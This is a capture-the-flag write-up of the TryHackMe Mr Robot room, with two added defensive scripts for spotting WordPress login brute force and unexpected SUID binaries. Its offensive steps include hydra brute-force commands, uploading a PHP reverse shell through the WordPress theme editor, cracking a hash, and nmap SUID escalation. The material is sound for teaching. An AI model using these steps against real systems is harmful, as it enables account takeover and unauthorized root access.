Mr Robot CTF Writeup

Max Register
7 min read · May 4, 2022

Today we will be going through the Mr Robot themed room on tryhackme.com. This room is based on the TV show and was really fun to work through. Follow along until we root this box together!

This write-up is dedicated to my Cyber Security professor Dr. Cooper. Thanks for the great semester!

Initial Scans

First, we start off with an Nmap scan. This scan shows the open ports and what service is running on each of them.

kali@kali-> nmap -sC -sV -oA nmap 10.10.223.195
Nmap scan report for 10.10.223.195
Host is up (0.10s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 8 11:49:29 2022 -- 1 IP address (1 host up) scanned in 34.04 seconds

The scan shows three ports. Two are open, and both are web server ports: HTTP (80) and HTTPS (443). The SSH port 22 is closed, so let's focus on the web ports.

Gobuster

To find any interesting pages or artifacts on a website I always start out by looking at the Gobuster scan. This tool brute-forces common page and folder names against a wordlist and gives us a map of the site without having to manually look through every link.

kali@kali-> gobuster dir -u http://10.10.108.85:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.108.85:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/11 19:38:35 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 235] [--> http://10.10.108.85/images/]
/blog (Status: 301) [Size: 233] [--> http://10.10.108.85/blog/]
/rss (Status: 200) [Size: 364]
/sitemap (Status: 200) [Size: 0]
/login (Status: 302) [Size: 0] [--> http://10.10.108.85:80/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://10.10.108.85:80/0/]
/feed (Status: 200) [Size: 809]
/video (Status: 301) [Size: 234] [--> http://10.10.108.85/video/]
/image (Status: 301) [Size: 0] [--> http://10.10.108.85:80/image/]
/atom (Status: 200) [Size: 623]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.108.85/wp-content/]
/admin (Status: 301) [Size: 234] [--> http://10.10.108.85/admin/]
/audio (Status: 301) [Size: 234] [--> http://10.10.108.85/audio/]
/intro (Status: 200) [Size: 516314]
/wp-login (Status: 200) [Size: 2627]
/css (Status: 301) [Size: 232] [--> http://10.10.108.85/css/]
/rss2 (Status: 200) [Size: 809]
/license (Status: 200) [Size: 309]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.108.85/wp-includes/]
/js (Status: 301) [Size: 231] [--> http://10.10.108.85/js/]
/Image (Status: 301) [Size: 0] [--> http://10.10.108.85:80/Image/]
/rdf (Status: 200) [Size: 813]
/page1 (Status: 200) [Size: 8221]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.108.85:80/wp-admin/]
/%20 (Status: 301) [Size: 0] [--> http://10.10.108.85:80/]
Progress: 4951 / 220561 (2.24%) ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2022/04/11 19:49:51 Finished
===============================================================

Here we see a few pages that indicate WordPress is running on this site. The /wp-login and /wp-admin paths are dead giveaways that WordPress is present. Navigating to the /wp-login page we see a login prompt.

Let's look at the /robots page and see if there is anything else interesting there.

This is a list of files on the website that the owners did not want indexed by search engines. These could be useful files, so let's download them and find out.

It looks like we found our first flag, and a set of possible usernames and passwords! Saving this info to our working folder will help us later.

Brute Forcing the Login Password

We can attempt to gain access to this login page by brute-forcing, or guessing, the password. We found what seemed to be a list of passwords or usernames during our initial scanning phase. Let's use those to guess the credentials for this login page.

We need to capture the login request by attempting to log in while using FoxyProxy or a similar browser plugin to proxy the traffic through Burp Suite's intercept.

We are interested in the last line here: we need to save the format of the login request to use with our brute force tool. Copy the first part of the last line up until the end of the submitted password, like so.

kali@kali-> hydra -L fsocity.dic -p password 10.10.151.96 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid" -t 30

This command supplies a list of usernames with -L, a single password with -p, the target IP address, the request type (http-post-form), the path of the login page, the form parameters used by the POST request, the error string that indicates a wrong username was entered, and finally the number of threads to use with -t.

Running this we get the username Elliot. Now we can do the same thing with a list of passwords to get the full login credentials.

kali@kali-> hydra -l Elliot -P tail-fsocity.dic 10.10.151.96 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30

After running we should get the login credentials!
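From the defender's side, a hydra run like the two above leaves a distinctive trace in the web server's access log. The following Python script is added here and is not part of the original write-up: it flags any source IP that POSTs to /wp-login.php at least a threshold number of times inside a 60-second window, and records whether a 302 redirect (WordPress's response to a successful login, as opposed to the 200 error page for a wrong password) appears in that burst; the IPs and log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse(line):
    # Fields of one access-log line, or None if the line does not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d

def detect_wp_bruteforce(lines, window_s=60, threshold=20):
    """ip -> (failed_posts, succeeded) for IPs sending >= threshold POSTs to
    /wp-login.php within window_s seconds. WordPress answers a bad password with
    200 (error page) and a good one with a 302, so a 302 in the burst is a hit."""
    events = defaultdict(list)
    for line in lines:
        e = parse(line)
        if e and e["method"] == "POST" and e["path"].split("?")[0] == "/wp-login.php":
            events[e["ip"]].append((e["ts"], e["status"]))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over time-sorted events
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                failed = sum(1 for _, s in evs if s == 200)
                hits[ip] = (failed, any(s == 302 for _, s in evs))
                break
    return hits

def _line(ip, sec, method, path, status):  # builds one constructed log line
    return f'{ip} - - [08/Apr/2022:11:50:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "-"'
# Constructed sample: a hydra run is a burst of 200s from one IP, then a 302.
SAMPLE_LOG = (
    [_line("10.10.14.5", s, "POST", "/wp-login.php", 200) for s in range(25)]
    + [_line("10.10.14.5", 25, "POST", "/wp-login.php", 302),
       _line("192.168.1.9", 40, "POST", "/wp-login.php", 200)]
)
```

Tune window_s and threshold to the site's normal login rate; a legitimate user rarely submits more than a handful of login forms per minute.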

Gaining a foothold on the System

Now that we have access to the WordPress dashboard we can upload a PHP reverse shell to gain access to the system.

First we will need to find a suitable reverse shell. There are some located in the /usr/share/laudanum directory. Find one you want to use and copy it to our working directory.

┌──(kali㉿kali)-[~/Documents/mrRobot]
└─$ locate php-reverse-shell
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

┌──(kali㉿kali)-[~/Documents/mrRobot]
└─$ cp /usr/share/laudanum/php/php-reverse-shell.php ~/Documents/mrRobot

We need to edit the IP address and port in our shell so that it calls back to our machine; opening it in your favorite text editor, such as nano, vi, or vim, will do the trick.

Scroll down until you see the IP and port variables and change those to match your tun0 IP, the one TryHackMe's VPN assigns. Pick a port that is not in use and remember which one, so we can set up our listener.

To upload the shell we can use the appearance editor in WordPress. This will allow us to replace an existing PHP page with our malicious code.

Go to Appearance -> Editor -> 404.php

Here is where we will replace the existing code with our shell code.

Now that our code is updated we can click 'Update File' and get ready to catch our shell. Open up a terminal and use Netcat to open a listener on the port from the reverse shell script.

All we have to do to get the shell is navigate to the 404.php page we edited; our reverse shell will run and connect back to us.

Success, we now have a foothold on the system!

Initial Reconnaissance

Initially we upgraded our shell with Python and took a look in the home folder. Here we found a password hash we had access to, and another key in the same name format as the one we found earlier on the web server. We didn't have access to that flag, though, so let's try cracking this hash and using the account to open it.

Cracking Hash with John The Ripper

kali@kali-> john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This command will crack the password and output the plaintext. Once we have the password we can use the username and password to log in to the robot account and view the second key.

Privilege Escalation

We can use preinstalled binaries with the SUID bit set for privilege escalation. To find these binaries we use the following command:

find / -perm -u=s -type f 2>/dev/null

We see that Nmap is in the list of SUID binaries. This means we can run Nmap in interactive mode and execute commands as root. To get a shell from Nmap's interactive mode we simply run !sh. Lastly, we can navigate to the root folder and grab the final flag.
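The defensive counterpart to the SUID check above is a periodic audit that compares the SUID binaries on the host against a known baseline. This Python script is added here and is not from the original write-up: it does what find / -perm -u=s -type f does and reports anything outside the baseline (nmap, on this box); the baseline set is constructed and would in practice be generated once from a clean build of the same image.

```python
import os
import stat

# Constructed baseline: SUID binaries expected on a stock Ubuntu host (partial).
# A real baseline is generated once from a clean build of the same image.
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount", "/bin/umount",
}
SKIP_DIRS = ("/proc", "/sys", "/dev")  # pseudo-filesystems, nothing to audit

def is_suid(mode):
    # Regular file with the set-user-ID bit: what `find / -perm -u=s -type f` matches.
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def find_suid(root="/"):
    # Walk root and yield every SUID regular file; unreadable entries are
    # skipped, like the 2>/dev/null in the find command above.
    for dirpath, dirs, files in os.walk(root, onerror=lambda err: None):
        dirs[:] = [d for d in dirs if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if is_suid(mode):
                yield path

def unexpected_suid(paths, baseline=BASELINE_SUID):
    # SUID files not in the baseline; each one should either be added to the
    # baseline deliberately or have the bit stripped (chmod u-s).
    return sorted(set(paths) - set(baseline))

if __name__ == "__main__":
    for p in unexpected_suid(find_suid("/")):
        print("unexpected SUID binary:", p)
```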

It has been a great journey walking through this machine with you. Take care and happy hacking!
